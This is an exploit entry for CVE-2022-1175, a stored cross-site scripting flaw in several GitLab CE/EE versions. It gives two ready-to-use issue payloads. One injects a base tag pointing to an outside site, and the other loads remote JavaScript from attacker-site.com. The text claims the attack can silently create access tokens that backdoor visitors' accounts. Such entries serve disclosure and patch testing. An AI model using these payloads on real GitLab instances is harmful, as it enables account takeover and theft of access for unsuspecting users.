# Exploit Title: Gitlab Stored XSS
# Exploit Authors: Greenwolf & stacksmashing
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install
# Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2
# Tested on: Linux
# CVE : CVE-2022-1175
# References: https://github.com/Greenwolf/CVE-2022-1175
Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor.
<pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>
Standard script include also works depending on the sites CSP policy. This is more stealthy.
<pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>